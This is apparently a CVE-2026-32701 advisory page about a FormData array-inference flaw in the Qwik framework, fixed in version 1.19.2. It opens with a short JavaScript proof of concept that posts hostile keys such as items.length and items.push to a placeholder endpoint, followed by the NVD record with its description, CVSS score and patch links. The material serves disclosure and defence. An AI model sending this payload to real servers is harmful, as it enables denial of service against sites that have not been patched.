CVE-2026-32701

// PoC for CVE-2026-32701 // Conceptual payload to pollute array properties via FormData // Scenario: Sending a POST request to a vulnerable Qwik City endpoint const formData = new FormData(); // Normal array indices formData.append('items.0', 'item1'); formData.append('items.1', 'item2'); // Malicious object properties injected into the array path // These may override Array.prototype methods or properties formData.append('items.toString', 'HACKED'); formData.append('items.length', '99999'); formData.append('items.push', 'unexpected_value'); // Send the request fetch('https://target-vulnerable-endpoint.com/api/submit', { method: 'POST', body: formData }).then(response => console.log('Request sent')); // Server-side result (conceptual): // The parsed object 'items' might look like: // { // 0: 'item1', // 1: 'item2', // toString: 'HACKED', // length: '99999', // push: 'unexpected_value' // } // This causes type confusion when the app tries to use .push() or access .length.

{"cve": {"id": "CVE-2026-32701", "sourceIdentifier": "[email protected]", "published": "2026-03-20T09:16:14.520", "lastModified": "2026-03-23T15:30:54.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Qwik is a performance-focused JavaScript framework. Versions prior to 1.19.2 improperly inferred arrays from dotted form field names during FormData parsing. By submitting mixed array-index and object-property keys for the same path, an attacker could cause user-controlled properties to be written onto values that application code expected to be arrays. When processing application/x-www-form-urlencoded or multipart/form-data requests, Qwik City converted dotted field names (e.g., items.0, items.1) into nested structures. If a path was interpreted as an array, additional attacker-supplied keys on that path—such as items.toString, items.push, items.valueOf, or items.length—could alter the resulting server-side value in unexpected ways, potentially leading to request handling failures, denial of service through malformed array state or oversized lengths, and type confusion in downstream code. This issue was fixed in version 1.19.2."}, {"lang": "es", "value": "Qwik es un framework de JavaScript centrado en el rendimiento. Las versiones anteriores a la 1.19.2 inferían incorrectamente arrays a partir de nombres de campos de formulario con puntos durante el análisis de FormData. Al enviar claves de índice de array y de propiedad de objeto mezcladas para la misma ruta, un atacante podría hacer que las propiedades controladas por el usuario se escribieran sobre valores que el código de la aplicación esperaba que fueran arrays. Al procesar solicitudes application/x-www-form-urlencoded o multipart/form-data, Qwik City convertía los nombres de campo con puntos (p. ej., items.0, items.1) en estructuras anidadas. Si una ruta se interpretaba como un array, claves adicionales proporcionadas por el atacante en esa ruta —como items.toString, items.push, items.valueOf o items.length— podrían alterar el valor resultante del lado del servidor de formas inesperadas, lo que podría llevar a fallos en el manejo de solicitudes, denegación de servicio a través de un estado de array malformado o longitudes excesivas, y confusión de tipos en el código subsiguiente. Este problema se solucionó en la versión 1.19.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-843"}, {"lang": "en", "value": "CWE-1321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qwik:qwik:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.19.2", "matchCriteriaId": "EF7EC6DC-930F-497B-BAA2-E236F71CE7CB"}]}]}], "references": [{"url": "https://github.com/QwikDev/qwik/commit/7b5867c3dd8925df9aa96c4296b1e95a4c2af87d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/QwikDev/qwik/security/advisories/GHSA-whhv-gg5v-864r", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}